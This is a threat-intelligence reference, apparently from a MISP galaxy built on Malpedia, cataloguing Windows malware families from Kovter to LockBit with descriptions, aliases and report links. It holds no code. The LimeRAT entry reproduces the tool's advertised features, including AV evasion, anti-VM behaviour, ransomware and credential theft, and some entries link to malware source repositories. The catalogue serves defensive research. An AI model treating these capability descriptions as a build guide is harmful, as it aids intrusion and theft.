https://unit42.paloaltonetworks.com/unit42-bisonal-malware-used-attacks-russia-south-korea/

https://researchcenter.paloaltonetworks.com/2018/07/unit42-bisonal-malware-used-attacks-russia-south-korea/

https://www.ptsecurity.com/upload/corporate/ru-ru/pt-esc/winnti-2020-rus.pdf

https://www.ptsecurity.com/upload/corporate/ru-ru/webinars/ics/winnti-shadowpad.pdf

Kovter

Kovter is a Police Ransomware

Feb 2012 - Police Ransomware Aug 2013 - Became AD Fraud Mar 2014 - Ransomware to AD Fraud malware June 2014 - Distributed from sweet orange exploit kit Dec 2014 - Run affiliated node Apr 2015 - Spread via fiesta and nuclear pack May 2015 - Kovter become fileless 2016 - Malvertising campaign on Chrome and Firefox June 2016 - Change in persistence July 2017 - Nemucod and Kovter was packed together Jan 2018 - Cyclance report on Persistence

The tag is: misp-galaxy:malpedia="Kovter"

Kovter is also known as:

Table 3839. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.kovter

https://www.cybereason.com/blog/how-click-fraud-commodity-malware-transforms-into-an-advanced-threat

https://github.com/ewhitehats/kovterTools/blob/master/KovterWhitepaper.pdf

https://www.symantec.com/connect/blogs/kovter-malware-learns-poweliks-persistent-fileless-registry-update

https://us-cert.cisa.gov/ncas/alerts/aa20-345a

https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/

https://blog.malwarebytes.com/threat-analysis/2016/07/untangling-kovter/

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/

https://blog.malwarebytes.com/threat-analysis/2015/01/major-malvertising-campaign-hits-sites-with-combined-total-monthly-traffic-of-1-5bn-visitors/

https://github.com/itaymigdal/malware-analysis-writeups/blob/main/Kovter/Kovter.md

https://0xchrollo.github.io/articles/unpacking-kovter-malware/

https://0x00sec.org/t/analyzing-modern-malware-techniques-part-1/18663

https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/kovter-an-evolving-malware-gone-fileless

KPOT Stealer

KPOT is an information-stealing Trojan horse that can steal information from infected computers. It is distributed through phishing emails and malicious websites. Once executed on a computer, KPOT can steal passwords, credit card numbers, and other personal information.

The tag is: misp-galaxy:malpedia="KPOT Stealer"

KPOT Stealer is also known as:

  • Khalesi

  • Kpot

Table 3840. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.kpot_stealer

https://www.proofpoint.com/us/threat-insight/post/new-kpot-v20-stealer-brings-zero-persistence-and-memory-features-silently-steal

https://www.flashpoint-intel.com/blog/malware-campaign-targets-jaxx-cryptocurrency-wallet-users/

https://isc.sans.edu/diary/26010

https://github.com/Dump-GUY/Malware-analysis-and-Reverse-engineering/blob/main/kpot2/KPOT.md

https://blag.nullteilerfrei.de/2020/04/26/use-ghidra-to-decrypt-strings-of-kpotstealer-malware/

https://isc.sans.edu/diary/25934

https://blog.ensilo.com/game-of-trojans-dissecting-khalesi-infostealer-malware

https://news.drweb.com/show/?i=13242&lng=en

https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors

https://www.zdnet.com/article/revil-ransomware-gang-acquires-kpot-malware/

https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/

https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf

https://medium.com/s2wlab/deep-analysis-of-kpot-stealer-fb1d2be9c5dd

Krachulka

According to ESET, this malware family is a banking trojan and was active in Brazil until the middle of 2019. Its most noticeable characteristic was its usage of well-known cryptographic methods to encrypt strings, as opposed to the majority of Latin American banking trojans that mainly use custom encryption schemes.

The tag is: misp-galaxy:malpedia="Krachulka"

Krachulka is also known as:

Table 3841. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.krachulka

https://www.welivesecurity.com/2021/12/15/dirty-dozen-latin-america-amavaldo-zumanek/

KrakenKeylogger

KrakenKeylogger is a .NET based Infostealer malware sold in Underground hacking forums

The tag is: misp-galaxy:malpedia="KrakenKeylogger"

KrakenKeylogger is also known as:

Table 3843. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.krakenkeylogger

https://0xtoxin.github.io/malware%20analysis/KrakenKeylogger-pt1/

https://0xtoxin.github.io/threat%20hunting/KrakenKeylogger-pt2/

KrBanker

ThreatPost describes KRBanker (Blackmoon) as a banking Trojan designed to steal user credentials from various South Korean banking institutions. It was discovered in early 2014 and since then has adopted a variety of infection and credential stealing techniques.

The tag is: misp-galaxy:malpedia="KrBanker"

KrBanker is also known as:

  • BlackMoon

Table 3844. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.krbanker

https://fidelissecurity.com/threatgeek/threat-intelligence/blackmoon-banking-trojan-new-framework/

https://www.proofpoint.com/us/threat-insight/post/Updated-Blackmoon-Banking-Trojan

https://zairon.wordpress.com/2014/04/15/trojan-banking-47d18761d46d8e7c4ad49cc575b0acc2bb3f49bb56a3d29fb1ec600447cb89a4/

http://researchcenter.paloaltonetworks.com/2016/05/unit42-krbanker-targets-south-korea-through-adware-and-exploit-kits-2/

https://www.peppermalware.com/2019/03/analysis-of-blackmoon-banking-trojans.html

KrDownloader

The tag is: misp-galaxy:malpedia="KrDownloader"

KrDownloader is also known as:

Table 3845. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.krdownloader

Kronos

Kronos malware is a sophisticated banking Trojan that first emerged in 2014. It is designed to target financial institutions and steal sensitive banking information. The malware is primarily spread through phishing campaigns and exploit kits. Once installed on a victim’s computer, Kronos can capture login credentials, credit card details, and other personal information by keylogging and form grabbing techniques. It can also bypass security measures such as two-factor authentication. Kronos employs advanced evasion techniques to avoid detection by antivirus software and actively updates itself to evade security patches. It has been known to target a wide range of banking systems and has affected numerous organizations worldwide. The malware continues to evolve, making it a significant threat to online banking security.

The tag is: misp-galaxy:malpedia="Kronos"

Kronos is also known as:

  • Osiris

Table 3846. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.kronos

https://www.proofpoint.com/us/threat-insight/post/kronos-reborn

https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree

https://www.securonix.com/securonix-threat-research-kronos-osiris-banking-trojan-attack

https://blog.morphisec.com/long-live-osiris-banking-trojan-targets-german-ip-addresses

https://therecord.media/osiris-banking-trojan-shuts-down-as-new-ares-variant-emerges/

https://www.proofpoint.com/us/threat-insight/post/kronos-banking-trojan-used-to-deliver-new-point-of-sale-malware

https://twitter.com/3xp0rtblog/status/1294157781415743488

https://blog.malwarebytes.com/threat-analysis/2016/10/new-looking-sundown-ek-drops-smoke-loader-kronos-banker/

https://securityintelligence.com/the-father-of-zeus-kronos-malware-discovered/

https://research.checkpoint.com/deep-dive-upas-kit-vs-kronos/

https://vx-underground.org/archive/APTs/2017/2017.12.11/Money%20Taker.pdf

https://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware/

https://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware-p2/

https://dissectingmalwa.re/osiris-the-god-of-afterlifeand-banking-malware.html

https://unit42.paloaltonetworks.com/banking-trojan-techniques/

https://www.trendmicro.com/en_us/research/22/g/gootkit-loaders-updated-tactics-and-fileless-delivery-of-cobalt-strike.html

https://www.zdnet.com/article/security-researcher-malwaretech-pleads-guilty/

https://intel471.com/blog/privateloader-malware

https://blog.trendmicro.com/trendlabs-security-intelligence/operation-black-atlas-endangers-in-store-card-payments-and-smbs-worldwide-switches-between-blackpos-and-other-tools/

https://www.zscaler.com/blogs/security-research/ares-malware-grandson-kronos-banking-trojan

KryptoCibule

The tag is: misp-galaxy:malpedia="KryptoCibule"

KryptoCibule is also known as:

Table 3847. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.kryptocibule

https://www.welivesecurity.com/2020/09/02/kryptocibule-multitasking-multicurrency-cryptostealer/

Kuaibu

The tag is: misp-galaxy:malpedia="Kuaibu"

Kuaibu is also known as:

  • Barys

  • Gofot

  • Kuaibpy

Table 3849. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.kuaibu8

Kuluoz

The tag is: misp-galaxy:malpedia="Kuluoz"

Kuluoz is also known as:

Table 3850. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.kuluoz

Kutaki

Cofense characterizes Kutaki as a data stealer that uses old-school techniques to detect sandboxes and debugging. Kutaki however works quite well against unhardened virtual machines and other analysis devices. By backdooring a legitimate application, it can fool unsophisticated detection methodologies.

The tag is: misp-galaxy:malpedia="Kutaki"

Kutaki is also known as:

Table 3852. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.kutaki

https://cofense.com/kutaki-malware-bypasses-gateways-steal-users-credentials/

Kwampirs

Kwampirs is a family of malware which uses SMB to spread. It typically will not execute or deploy in environments in which there is no publicly available admin$ share. It is a fully featured backdoor which can download additional modules. Typical C2 traffic is over HTTP and includes "q=[ENCRYPTED DATA]" in the URI.

The tag is: misp-galaxy:malpedia="Kwampirs"

Kwampirs is also known as:

Table 3853. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.kwampirs

http://www.documentcloud.org/documents/6821581-FLASH-CP-000111-MW-Downgraded-Version.html

https://www.atlanticcouncil.org/wp-content/uploads/2020/07/Breaking-trust-Shades-of-crisis-across-an-insecure-software-supply-chain.pdf

https://www.zdnet.com/article/fbi-re-sends-alert-about-supply-chain-attacks-for-the-third-time-in-three-months/

https://resources.cylera.com/hubfs/Cylera%20Labs/Cylera%20Labs%20Kwampirs%20Shamoon%20Technical%20Report.pdf

https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf

https://www.symantec.com/blogs/threat-intelligence/orangeworm-targets-healthcare-us-europe-asia

https://thehackernews.com/2022/03/researchers-find-new-evidence-linking.html

https://blog.reversinglabs.com/blog/unpacking-kwampirs-rat

https://resources.cylera.com/new-evidence-linking-kwampirs-malware-to-shamoon-apts

https://www.securityartwork.es/2019/03/13/orangeworm-group-kwampirs-analysis-update/

https://www.zdnet.com/article/fbi-warns-about-ongoing-attacks-against-software-supply-chain-companies/

Ladon

According to its self-description, Ladon is a multi-threaded plug-in comprehensive scanning artifact for large-scale network penetration, including port scanning, service identification, network assets, password blasting, high-risk vulnerability detection and one click getshell. It supports batch a segment / b segment / C segment and cross network segment scanning, as well as URL, host and domain name list scanning.

The tag is: misp-galaxy:malpedia="Ladon"

Ladon is also known as:

Table 3854. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.ladon

https://asec.ahnlab.com/en/47455/

https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023

https://asec.ahnlab.com/en/56236/

https://github.com/k8gege/Ladon

https://www.paloaltonetworks.com/blog/security-operations/through-the-cortex-xdr-lens-uncovering-a-new-activity-group-targeting-governments-in-the-middle-east-and-africa/

LambLoad

According to Microsoft, this is a downloader used in a supply chain attack involving a malicious variant of an application developed by CyberLink. It is centered around a legitimate CyberLink application installer that has been modified to include malicious code that downloads, decrypts, and loads a second-stage payload. The file, which was signed using a valid certificate issued to CyberLink Corp., is hosted on legitimate update infrastructure owned by CyberLink and includes checks to limit the time window for execution and evade detection by security products.

The tag is: misp-galaxy:malpedia="LambLoad"

LambLoad is also known as:

  • OfficeCertTea

Table 3857. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.lambload

https://www.microsoft.com/en-us/security/blog/2023/11/22/diamond-sleet-supply-chain-compromise-distributes-a-modified-cyberlink-installer/

https://www.virusbulletin.com/uploads/pdf/conference/vb2023/papers/Lazarus-campaigns-and-backdoors-in-2022-2023.pdf

https://securelist.com/the-lazarus-group-deathnote-campaign/109490/

https://www.welivesecurity.com/2022/09/30/amazon-themed-campaigns-lazarus-netherlands-belgium/

Lamdelin

The tag is: misp-galaxy:malpedia="Lamdelin"

Lamdelin is also known as:

Table 3858. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.lamdelin

http://news.thewindowsclub.com/poorly-coded-lamdelin-lockscreen-ransomware-alt-f4-88576/

LatentBot

FireEye describes this malware as a highly obfuscated bot that has been in the wild since mid-2013. It has managed to leave hardly any traces on the Internet, is capable of watching its victims without ever being noticed, and can even corrupt a hard disk, thus making a PC useless.

Using Dynamic Threat Intelligence, they have observed multiple campaigns targeting multiple industries in the United States, United Kingdom, South Korea, Brazil, United Arab Emirates, Singapore, Canada, Peru and Poland – primarily in the financial services and insurance sectors. Although the infection strategy is not new, the final payload dropped – which they named LATENTBOT – caught attention since it implements several layers of obfuscation, a unique exfiltration mechanism, and has been very successful at infecting multiple organizations.

The tag is: misp-galaxy:malpedia="LatentBot"

LatentBot is also known as:

Table 3860. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.latentbot

https://cys-centrum.com/ru/news/module_trojan_for_unauthorized_access

http://malware-traffic-analysis.net/2017/04/25/index.html

https://blog.malwarebytes.com/threat-analysis/2017/06/latentbot/

https://www.cert.pl/news/single/latentbot-modularny-i-silnie-zaciemniony-bot/

https://www.fireeye.com/blog/threat-research/2015/12/latentbot_trace_me.html

Laturo Stealer

The tag is: misp-galaxy:malpedia="Laturo Stealer"

Laturo Stealer is also known as:

Table 3861. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.laturo

https://seclists.org/snort/2019/q3/343

LazarLoader

The tag is: misp-galaxy:malpedia="LazarLoader"

LazarLoader is also known as:

Table 3863. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.lazarloader

https://asec.ahnlab.com/ko/53832/

https://securelist.com/bluenoroff-methods-bypass-motw/108383/

LDR4

A further branch of the URSNIF collection of malware families. According to Mandiant, it no longer has focus on banking fraud but generic backdoor capabilities instead.

The tag is: misp-galaxy:malpedia="LDR4"

LDR4 is also known as:

Table 3868. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.ldr4

https://www.mandiant.com/resources/blog/rm3-ldr4-ursnif-banking-fraud

Leakthemall

Ransomware.

The tag is: misp-galaxy:malpedia="Leakthemall"

Leakthemall is also known as:

Table 3869. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.leakthemall

https://id-ransomware.blogspot.com/2020/09/leakthemall-ransomware.html

Lemon Duck

Lemon Duck is a monerocrypto-mining malware with capabilitiy to spread rapidly across the entire network. The malware runs its payload mainly in memory. Internal network spreading is performed by SMB RCE Vulnerability (CVE-2017-0144), or brute-force attacks.

The tag is: misp-galaxy:malpedia="Lemon Duck"

Lemon Duck is also known as:

Table 3871. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.lemonduck

https://www.crowdstrike.com/blog/lemonduck-botnet-targets-docker-for-cryptomining-operations/

https://www.bleepingcomputer.com/news/security/vulnerable-microsoft-sql-servers-targeted-with-cobalt-strike/

https://news.sophos.com/en-us/2019/10/01/lemon_duck-powershell-malware-cryptojacks-enterprise-networks/

https://therecord.media/lemonduck-botnet-evolves-to-allow-hands-on-keyboard-intrusions/

https://www.trendmicro.com/en_us/research/21/e/proxylogon-a-coinminer—​a-ransomware—​and-a-botnet-join-the-part.html

https://cybotsai.com/lemon-duck-attack/

https://www.bitdefender.com/files/News/CaseStudies/study/373/Bitdefender-PR-Whitepaper-LemonDuck-creat4826-en-EN-GenericUse.pdf

https://www.microsoft.com/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/

https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/

https://notes.netbytesec.com/2021/06/lemon-duck-cryptominer-technical.html

https://success.trendmicro.com/solution/000261916

https://asec.ahnlab.com/en/31811/

https://news.sophos.com/en-us/2021/05/07/new-lemon-duck-variants-exploiting-microsoft-exchange-server/?cmp=30728

https://blog.talosintelligence.com/2021/05/lemon-duck-spreads-wings.html

Lethic

Lethic is a spambot dating back to 2008. It is known to be distributing low-level pharmaceutical spam.

The tag is: misp-galaxy:malpedia="Lethic"

Lethic is also known as:

Table 3873. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.lethic

http://resources.infosecinstitute.com/win32lethic-botnet-analysis/

http://www.vkremez.com/2017/11/lets-learn-lethic-spambot-survey-of.html

http://www.malware-traffic-analysis.net/2017/11/02/index.html

LetMeOut

The tag is: misp-galaxy:malpedia="LetMeOut"

LetMeOut is also known as:

Table 3874. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.letmeout

http://blog.nsfocus.net/murenshark/

LgoogLoader

LgoogLoader is an installer that drops three files: a batch file, an AutoIt interpreter, and an AutoIt script. After downloading, it executes the batch file.

The tag is: misp-galaxy:malpedia="LgoogLoader"

LgoogLoader is also known as:

Table 3875. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.lgoogloader

https://inside.harfanglab.io/blog/articles/cyber-threat-intelligence/loader-galore-taskloader-at-the-start-of-a-pay-per-install-infection-chain/

https://blog.polyswarm.io/nullmixer-drops-multiple-malware-families

LIGHTBUNNY

The tag is: misp-galaxy:malpedia="LIGHTBUNNY"

LIGHTBUNNY is also known as:

Table 3877. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.lightbunny

https://www.mandiant.com/resources/blog/unc961-multiverse-financially-motivated

LightlessCan

LightlessCan is a complex HTTP(S) RAT, that is a successor of the Lazarus RAT named BlindingCan.

In Q2 2022 and Q1 2023, it was deployed in targeted attacks against an aerospace company in Spain and a technology company in India.

Besides the support for commands already present in BlindingCan, its most significant update is mimicked functionality of many native Windows commands: • ipconfig • net • netsh advfirewall firewall • netstat • reg • sc • ping (for both IPv4 and IPv6 protocols) • wmic process call create • nslookup • schstasks • systeminfo • arp

These native commands are often abused by the attackers after they have gotten a foothold in the target’s system. Lightless is able to execute them discreetly within the RAT itself, rather than being executed visibly in the system console. This provides stealthiness, both in evading real-time monitoring solutions like EDRs, and postmortem digital forensic tools.

LightlessCan use RC6 for decryption of its configuration, and also for encryption and decryption of network traffic.

The tag is: misp-galaxy:malpedia="LightlessCan"

LightlessCan is also known as:

Table 3878. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.lightlesscan

https://www.welivesecurity.com/en/eset-research/lazarus-luring-employees-trojanized-coding-challenges-case-spanish-aerospace-company/

https://www.virusbulletin.com/uploads/pdf/conference/vb2023/papers/Lazarus-campaigns-and-backdoors-in-2022-2023.pdf

Lightning Stealer

Lightning stealer can target 30+ Firefox and Chromium-based browsers and steal crypto wallets, Telegram data, Discord tokens, and Steam user’s data. Unlike other info stealers, Lightning Stealer stores all the stolen data in the JSON format for exfiltration.

The tag is: misp-galaxy:malpedia="Lightning Stealer"

Lightning Stealer is also known as:

Table 3880. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.lightning_stealer

https://blog.cyble.com/2022/04/05/inside-lightning-stealer/

LIGHTWORK

According to Mandiant, LIGHTWORK is a disruption tool written in C++ that implements the IEC-104 protocol to modify the state of RTUs over TCP. It crafts configurable IEC-104 ASDU messages, to change the state of RTU IOAs to ON or OFF. This sample works in tandem with PIEHOP, which sets up the execution.

The tag is: misp-galaxy:malpedia="LIGHTWORK"

LIGHTWORK is also known as:

Table 3881. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.lightwork

https://www.mandiant.com/resources/blog/cosmicenergy-ot-malware-russian-response

Ligsterac

The tag is: misp-galaxy:malpedia="Ligsterac"

Ligsterac is also known as:

Table 3882. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.ligsterac

https://securelist.com/atm-infector/74772/

http://atm.cybercrime-tracker.net/index.php

limedownloader

The tag is: misp-galaxy:malpedia="limedownloader"

limedownloader is also known as:

Table 3884. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.limedownloader

https://github.com/NYAN-x-CAT/Lime-Downloader

limeminer

The tag is: misp-galaxy:malpedia="limeminer"

limeminer is also known as:

Table 3885. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.limeminer

https://github.com/NYAN-x-CAT/Lime-Miner

LimeRAT

## Description
Simple yet powerful RAT for Windows machines. This project is simple and easy to understand, It should give you a general knowledge about dotNET malwares and how it behaves.

Main Features

  • .NET

  • Coded in Visual Basic .NET, Client required framework 2.0 or 4.0 dependency, And server is 4.0

  • Connection

  • Using pastebin.com as ip:port , Instead of noip.com DNS. And Also using multi-ports

  • Plugin

  • Using plugin system to decrease stub’s size and lower the AV detection

  • Encryption

  • The communication between server & client is encrypted with AES

  • Spreading

  • Infecting all files and folders on USB drivers

  • Bypass

  • Low AV detection and undetected startup method

  • Lightweight

  • Payload size is about 25 KB

  • Anti Virtual Machines

  • Uninstall itself if the machine is virtual to avoid scanning or analyzing

  • Ransomware

  • Encrypting files on all HHD and USB with .Lime extension

  • XMR Miner

  • High performance Monero CPU miner with user idle\active optimizations

  • DDoS

  • Creating a powerful DDOS attack to make an online service unavailable

  • Crypto Stealer

  • Stealing Cryptocurrency sensitive data

  • Screen-Locker

  • Prevents user from accessing their Windows GUI

  • And more

  • On Connect Auto Task

  • Force enable Windows RDP

  • Persistence

  • File manager

  • Passowrds stealer

  • Remote desktop

  • Bitcoin grabber

  • Downloader

  • Keylogger

The tag is: misp-galaxy:malpedia="LimeRAT"

LimeRAT is also known as:

Table 3887. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.limerat

https://blog.morphisec.com/tracking-hcrypt-an-active-crypter-as-a-service

https://blog.reversinglabs.com/blog/rats-in-the-library

https://blog.yoroi.company/research/limerat-spreads-in-the-wild/

https://www.youtube.com/watch?v=x-g-ZLeX8GM

https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord

https://lab52.io/blog/literature-lover-targeting-colombia-with-limerat/

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-american-entities-with-commodity-rats/BlindEagleIOCList.txt

https://www.trendmicro.com/en_us/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-ameri.html

https://blogs.juniper.net/en-us/threat-research/new-pastebin-like-service-used-in-multiple-malware-campaigns

https://felipetarijon.github.io/2022-12-12-limerat-infecting-unskilled-threat-actors/

https://lab52.io/blog/apt-c-36-recent-activity-analysis/

https://threatmon.io/apt-blind-eagles-malware-arsenal-technical-analysis/

https://blog.talosintelligence.com/2022/04/asyncrat-3losh-update.html

https://any.run/cybersecurity-blog/limerat-malware-analysis/

https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/targeted-attack-on-government-agencies.html

https://www.trendmicro.com/en_us/research/21/i/Water-Basilisk-Uses-New-HCrypt-Variant-to-Flood-Victims-with-RAT-Payloads.html

https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf

https://github.com/NYAN-x-CAT/Lime-RAT/

Limitail

The tag is: misp-galaxy:malpedia="Limitail"

Limitail is also known as:

Table 3888. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.limitail

LinseningSvr

The tag is: misp-galaxy:malpedia="LinseningSvr"

LinseningSvr is also known as:

Table 3889. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.linseningsvr

https://www.secureworks.com/research/analysis-of-dhs-nccic-indicators

LiteDuke

According to CarbonBlack, LiteDuke is a third stage backdoor. It appears to use the same dropper as PolyglotDuke. Its payload makes use of an AES encrypted SQLite database to store its configuration. LiteDuke supports a large number of individual commands including host information retrieval, file upload and download, and the ability to execute other code. LiteDuke C2 servers appear to be compromised servers, and the malware communicates with them using normal HTTP requests. It attempts to use a realistic User-Agent string to blend in better with normal HTTP traffic. ESET have dubbed it LiteDuke because it uses SQLite to store information such as its configuration.

The tag is: misp-galaxy:malpedia="LiteDuke"

LiteDuke is also known as:

Table 3892. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.liteduke

https://norfolkinfosec.com/looking-back-at-liteduke/

https://www.carbonblack.com/2020/03/26/the-dukes-of-moscow/

LiteHTTP

According to AlienVault, LiteHTTP bot is a new HTTP bot programmed in C#. The bot has the ability to collect system information, download and execute programs, and update and kill other bots present on the system.

The source is on GitHub: https://github.com/zettabithf/LiteHTTP

The tag is: misp-galaxy:malpedia="LiteHTTP"

LiteHTTP is also known as:

Table 3893. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.litehttp

https://viriback.com/recent-litehttp-activities-and-iocs/

https://malware.news/t/recent-litehttp-activities-and-iocs/21053

https://github.com/zettabithf/LiteHTTP

LOBSHOT

According to PCrisk, LOBSHOT is a type of malware with a feature called hVNC (Hidden Virtual Network Computing) that allows attackers to access a victim’s computer without being noticed. The hVNC component is effective in evading fraud detection systems. Also, LOBSHOT is being used to carry out financial crimes through the use of banking trojan and information-stealing functionalities.

The tag is: misp-galaxy:malpedia="LOBSHOT"

LOBSHOT is also known as:

Table 3894. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.lobshot

https://research.openanalysis.net/lobshot/bot/hvnc/triage/2023/07/16/lobshot.html

https://www.elastic.co/de/security-labs/elastic-security-labs-discovers-lobshot-malware

LockBit (Windows)

The tag is: misp-galaxy:malpedia="LockBit (Windows)"

LockBit (Windows) is also known as:

  • ABCD Ransomware

Table 3895. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.lockbit

https://www.bleepingcomputer.com/news/security/lockbit-ransomware-recruiting-insiders-to-breach-corporate-networks/

https://www.prodaft.com/m/reports/LockBit_Case_Report_TLPWHITE.pdf

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lockbit-targets-servers

https://intel471.com/blog/conti-ransomware-cooperation-maze-lockbit-ragnar-locker

https://therecord.media/australian-cybersecurity-agency-warns-of-spike-in-lockbit-ransomware-attacks/

https://blog.cyble.com/2021/08/16/a-deep-dive-analysis-of-lockbit-2-0/

https://therecord.media/missed-opportunity-bug-in-lockbit-ransomware-allowed-free-decryptions/

https://twitter.com/MsftSecIntel/status/1522690116979855360

https://medium.com/s2wlab/w4-july-en-story-of-the-week-ransomware-on-the-darkweb-c61965d0386a

https://cybergeeks.tech/a-technical-analysis-of-the-leaked-lockbit-3-0-builder/

https://blog.cyble.com/2022/07/05/lockbit-3-0-ransomware-group-launches-new-version/

https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf

https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf

https://www.trendmicro.com/en_us/research/22/g/lockbit-ransomware-group-augments-its-latest-variant—​lockbit-3-.html

https://blogs.vmware.com/security/2022/10/lockbit-3-0-also-known-as-lockbit-black.html

https://www.youtube.com/watch?v=C733AyPzkoc

https://medium.com/@lcam/lighting-the-exfiltration-infrastructure-of-a-lockbit-affiliate-and-more-f57fbb7a4e79

https://securelist.com/new-ransomware-trends-in-2022/106457/

https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3

https://www.trendmicro.com/en_us/research/22/a/analysis-and-Impact-of-lockbit-ransomwares-first-linux-and-vmware-esxi-variant.html

https://www.cybereason.com/blog/rising-threat-from-lockbit-ransomware

https://www.glimps.fr/lockbit3-0/

https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf

https://analyst1.com/blog/ransom-mafia-analysis-of-the-worlds-first-ransomware-cartel

https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions

https://blog.lexfo.fr/lockbit-malware.html

https://www.trendmicro.com/en_us/research/21/h/lockbit-resurfaces-with-version-2-0-ransomware-detections-in-chi.html

https://www.bleepingcomputer.com/news/security/lockbit-victim-estimates-cost-of-ransomware-attack-to-be-42-million/

https://news.sophos.com/en-us/2020/04/24/lockbit-ransomware-borrows-tricks-to-keep-up-with-revil-and-maze/

https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/

https://chuongdong.com/reverse%20engineering/2022/03/19/LockbitRansomware/

https://www.bleepingcomputer.com/news/security/march-2023-broke-ransomware-attack-records-with-459-incidents/

https://www.trendmicro.com/vinfo/us/security/news/ransomware-by-the-numbers/lockbit-conti-and-blackcat-lead-pack-amid-rise-in-active-raas-and-extortion-groups-ransomware-in-q1-2022

https://unit42.paloaltonetworks.com/emerging-ransomware-groups/

https://lifars.com/wp-content/uploads/2022/02/LockBitRansomware_Whitepaper.pdf

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-april-1st-2022-i-can-fight-with-a-keyboard/

https://www.ic3.gov/Media/News/2022/220204.pdf

https://www.bleepingcomputer.com/news/security/uk-rail-network-merseyrail-likely-hit-by-lockbit-ransomware/

https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack

https://www.mbsd.jp/2021/10/27/assets/images/MBSD_WhitePaper_A-deep-dive-analysis-of-LockBit2.0_Ransomware.pdf

https://blog.morphisec.com/the-babadeda-crypter-targeting-crypto-nft-defi-communities

https://github.com/albertzsigovits/malware-notes/blob/master/Ransomware/Lockbit.md

https://www.advanced-intel.com/post/from-russia-with-lockbit-ransomware-inside-look-preventive-solutions

https://documents.trendmicro.com/assets/pdf/datasheet-ransomware-in-Q1-2022.pdf

https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility

https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html

